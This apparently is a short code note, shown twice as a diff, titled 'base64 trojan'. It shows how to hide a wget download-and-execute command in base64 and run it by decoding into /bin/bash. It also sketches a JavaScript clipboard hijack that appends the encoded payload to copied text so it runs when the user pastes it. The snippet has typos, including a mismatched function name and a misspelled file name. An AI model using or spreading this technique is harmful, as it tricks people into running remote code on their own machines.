29942016 · June 3, 2016 16:53
diff --git a/base64 trojan b/base64 trojan
 #Hide a payload in base64 
 echo 'wget myplayoad.sh; chmod +X ./mypayload.sh; ./mypayload.sh' | base64

 #execution:
 echo d2dldCBteXBsYXlvYWQuc2g7IGNobW9kICtYIC4vbXlwYXlsb2FkLnNoOyAuL215cGF5bG9hZC5zaAo= | base64 -d | /bin/bash

 #javascript clipboard hijack, then force execution on paste.
 #javascript example:

 document.oncopy = hijackClipboard;

 function hijackClipbaord()
 {
  var userSelection = window.getSelection();
  userSelection += "my base64 payload";
  ...
 }
	#Hide a payload in base64
	echo 'wget myplayoad.sh; chmod +X ./mypayload.sh; ./mypayload.sh' \| base64

	#execution:
	echo d2dldCBteXBsYXlvYWQuc2g7IGNobW9kICtYIC4vbXlwYXlsb2FkLnNoOyAuL215cGF5bG9hZC5zaAo= \| base64 -d \| /bin/bash

	#javascript clipboard hijack, then force execution on paste.
	#javascript example:

	document.oncopy = hijackClipboard;

	function hijackClipbaord()
	{
	var userSelection = window.getSelection();
	userSelection += "my base64 payload";
	...
	}